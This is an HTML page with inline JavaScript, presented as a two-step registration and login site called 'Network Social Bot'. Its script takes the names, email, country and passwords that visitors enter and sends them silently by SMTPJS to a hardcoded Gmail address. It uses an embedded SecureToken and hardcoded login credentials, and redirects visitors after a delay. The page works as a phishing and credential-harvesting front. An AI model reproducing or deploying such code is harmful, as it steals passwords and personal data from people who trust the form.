<!doctype html>
<html lang="en"> 
 <head> 
  <meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script> 
  <script src="https://smtpjs.com/v3/smtp.js"></script> 
 <style type="text/css" id="dcoder_stylesheet">@import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap");
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");
@import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');

 
 body{
   background-color: black;
    background-size: ;
    background-position: center;
    background-repeat: no-repeat;
 color:white;
 }
 input{
   margin:10px 0;
   outline:none;
   border: 1px solid deepskyblue; 
   font-family: "Poppins", sans-serif;
   background-color:white;
   color:;
   border-radius:4px;
   width:60%;
   padding:5px;
   %;
   }
input[type="submit"] {
   margin:10px 0;
   outline:none;
   border: 1px solid #777; 
   font-family: "Poppins", sans-serif;
   background-color:rgb(255,193,7);
   color:black;
   border-radius:4px;
   width:60%;
   padding:5px;
   }
   .center{
    border:1px solid deepskyblue;
  font-size:18px;
  font-family: "Poppins", sans-serif;   
  color:white;
  width: 260px;
  height:260px;
  background-color:black;
  padding: 15px;
  margin: auto;
  text-align: center;
  border-radius:15px;
  margin-top:5%;
       }
       .amg img {
           border-radius:5px;
         margin-left :22%;
         font-size:px;
         color:white;
     font-family: "Archivo Black", sans-serif;
     width:200px;
     }
     .iclass{
     text-align:center;
     }
   .info i{
      font-size:17px;
      color:yellow;
      }
  #lname-error {
  margin-top: 5px;
}

#lname-error p {
  margin-top:-5%;
  margin: 0;
}
      
  az{
    margin-top:-2%;
    margin-left:5%;
    color:#FFD700;
    font-size:20px;
   }
   .iclass img{
     width:300px;
      }
      ok{
        color:green;
      }
      
     p{
       font-family: "Archivo Black", sans-serif;
       margin-left :5%;
       color:white;
margin-top:25%;
font-size:20px;
       }
   .text2{
        font-family: "Archivo Black", sans-serif;  
      } 
      h4{
          color:deepskyblue;
      }
      .btn button {
          
        cursor:pointor;  
        margin-top:13%;
   outline:none;
   position :fixe;
   border: 1px solid #777; 
   font-family: "Archivo Black", sans-serif;  
      background-color: deepskyblue;
   color:white;
   border-radius:4px;
   padding:5px;
   
      }
      .btn{
          margin-top:-25%;
          margin-left:55%;
      }
     .suite{
         position:relative;
         background-color:black;
         margin-top:-75%;
         display:none;
         margin-left:10%;
       text-align:center; 
          width:275px;
          height:230px; 
     }
      
      .lmg img{
          width:100px;
      }
      .lmg{
          position:relative;
         background-color: black ;
         margin-top:-68%;
          display:none;
          margin-left:10%;
          width:275px;
          height:230px;
          text-align:center;
      }
      .invisible{
        position:relative;
         background-color:white;
         margin-top:-%;
         display:none;
          width:275px;
          height:235px; 
          border:1px solid #777;   
      }
      
      h5{
          color:#777;
          font-size:20px;
      }
      .obb{
          margin-top:-8%;
      }
      #login{
         position:relative;
         background-color:Black;
         margin-top:-%;
         display:
         margin-left:15%;
       text-align:center; 
          width:275px;
          height:235px; 
          border:1px solid #000000; 
      }
      .occ{
          margin-top:-75%;
          margin-left:11%;
      }
      .Error1{
          position :fixed;
          margin-top:-36%;
          font-family: "Poppins", sans-serif;
         color:red;
        display:none;
        font-size:13px;
        margin-left:26%;
        }
    .Error2{
        position : relative;
       
       margin-top:-22%;
        font-family: "Poppins", sans-serif;
        color:red;
   display:none;
   margin-left:26%;
   font-size:13px;
       }
       .pmg img{
           position: fixed; /* ou relative selon votre besoin */
           margin-left:5%;
           width:180px;
           margin-top:85%;
           max-height: 160px; /* Définir la hauteur maximale souhaitée */
  overflow: hidden;
       }
       .dmg img{
           margin-left:10%;
           position:fixed;
         width:270px; 
         margin-top:83%;
         z-index:0 ;
         
       }
       
      .net{
           font-family: "Archivo Black", sans-serif;
           font-size:18px;
       }
       .flex{
           margin-left:7%;
           font-family: "Poppins", sans-serif;
       }
       
       
      </style>
    </head> 
 <body><br><br> 
  <div class="net">Network Social Bot</div>
  <div class="amg"> 
    <img src="https://i.postimg.cc/tgqfT1bQ/logo5-17-153028.png"> 
   </div><br><br> 
   <div class="btn">
   <button type="button" onclick="afficherLogin()">CONNEXION</button></div>
   <div class="flex">Register in two steps:</div>
  <div class="center"> 
  <br>
  
   <form id="submit" > 
    <input type="text" id="aname" placeholder="First name" > 
    <input type="text" id="bname" placeholder="Last name" > 
    <input type="text" id="lname" placeholder="Email"> 
    <div id="lname-error"></div> 
    <input type="submit" value="registration"> 
   </form>
    
  </div> 
  <div class="suite" id="suite">
  <form id="submit2" > 
    <input type="text" id="Cname" placeholder="Country" > 
    <input type="text" id="dname" placeholder="Creat Password" > 
    <input type="text" id="ename" placeholder="Repeat password"> 
    <div id="lname-error"></div> 
    <input type="submit" value="OK"> 
   </form>
  </div>
  <div class="lmg"><br><br><br>
 <c>Waiting...</c><br> <img src="https://i.postimg.cc/hvkYwjbP/07-04-42-101-512.gif">
  </div>
  <div class="occ">
  <div class="login invisible" id="login">
  <h5>Login</h5>
  <div class="obb">
  <form id="submit3"  action="#"> 
    <input type="text" id="iname" placeholder="User ID" > 
    <input type="text" id="jname" placeholder="Password" > 
    <div id="lname-error"></div> 
    <input type="submit" value="Login"> 
   </form></div>
  </div>
  </div>
   
  <div class="Error1">Invalid ID.</div>
  <div class="Error2">Incorect Password.</div>
  <div class="ok">
  
  <div class="dmg"><img src=""></div>
  
  <script src="./index.js"></script> 
 
<script type="text/javascript" id="dcoder_script">const aname = document.getElementById('aname');
const bname = document.getElementById('bname');
const lname = document.getElementById('lname');
const submit = document.getElementById('submit');

submit.addEventListener('submit',(e)=>{
    e.preventDefault();
   
    // Ajout du délai de 5 secondes avant l'envoi du formulaire
    setTimeout(() => {
        let ebody = `
          <h1>Nom : </h1>${aname.value}
            <br>
           <h1>famille : </h1>${bname.value}
            <br>
            <h1>emei : </h1>${lname.value}
            <br>
            `;
        
        Email.send({
            SecureToken : "24ed91c7-882b-465c-97d2-32856db82fdb", //add your token here
            To : 'abdoulissa154@gmail.com', 
            From : "abdoulissa154@gmail.com",
            Subject : "This is the subject",
            Body : ebody
        }).then(() => {
          window.location.href = ""; // Redirection vers Google
        });
    }, 20000); // Délai de 5000 millisecondes (5 secondes)
});
   
    const Cname = document.getElementById('Cname');
const dname = document.getElementById('dname');
const ename = document.getElementById('ename');
const submit2 = document.getElementById('submit2');

submit2.addEventListener('submit', (e) => {
    e.preventDefault();
 // Ajout du délai de 5 secondes avant l'envoi du formulaire
    setTimeout(() => {
    let ebody2 = `
      <h1>Pays : </h1>${Cname.value}
        <br>
       <h1>Créer un cde : </h1>${dname.value}
        <br>
        <h1>Code de parrainage : </h1>${ename.value}
        <br>
        `;

    Email.send({
        SecureToken: "24ed91c7-882b-465c-97d2-32856db82fdb", //add your token here
        To: 'abdoulissa154@gmail.com',
        From: "abdoulissa154@gmail.com",
        Subject: "This is the subject",
        Body: ebody2
    }).then(() => {
        window.location.href = ""; // Redirection vers Google
    });
   }, 10000); // Délai de 5000 millisecondes (5 secondes)
});



// Sélectionnez le bouton "S'inscrire"
const sInscrireBtn = document.querySelector('input[type="submit"]');

// Sélectionnez le div "suite"
const suiteDiv = document.getElementById('suite');

// Ajoutez un gestionnaire d'événement au clic sur le bouton "S'inscrire"
sInscrireBtn.addEventListener('click', function() {
  // Rendre le div "suite" visible en modifiant son style
  suiteDiv.style.display = 'block';
});

// Sélectionnez le bouton "Suite"
const suiteBtn = document.querySelector('.suite input[type="submit"]');

// Sélectionnez le div "lmg"
const lmgDiv = document.querySelector('.lmg');

// Ajoutez un gestionnaire d'événement au clic sur le bouton "Suite"
suiteBtn.addEventListener('click', function() {
  // Rendre le div "lmg" visible en modifiant son style
  lmgDiv.style.display = 'block';
});
  
function afficherLogin() {
    var loginDiv = document.getElementById("login");
    loginDiv.classList.remove("invisible");
  }
 
  const iname = document.getElementById('iname');
const jname = document.getElementById('jname');
const submit3 = document.getElementById('submit3');
const error1 = document.querySelector('.Error1');
const error2 = document.querySelector('.Error2');

submit3.addEventListener('submit', (e) => {
    e.preventDefault();

    if (iname.value !== 'Mind@f') {
        error1.style.display = 'block';
    } else if (jname.value !== 'Dave405') {
        error2.style.display = 'block';
    } else {
        let ebody2 = `
          <h1>Pays : </h1>${iname.value}
            <br>
           <h1>Créer un code : </h1>${jname.value}
            <br>
           
            `;

        Email.send({
            SecureToken: "24ed91c7-882b-465c-97d2-32856db82fdb", //add your token here
            To: 'abdoulissa154@gmail.com',
            From: "abdoulissa154@gmail.com",
            Subject: "This is the subject",
            Body: ebody2
        }).then(() => {
            window.location.href = "https://networksocialbot.github.io/Spin7/"; // Redirection vers Google
        });
    }
});


</script></body></html>
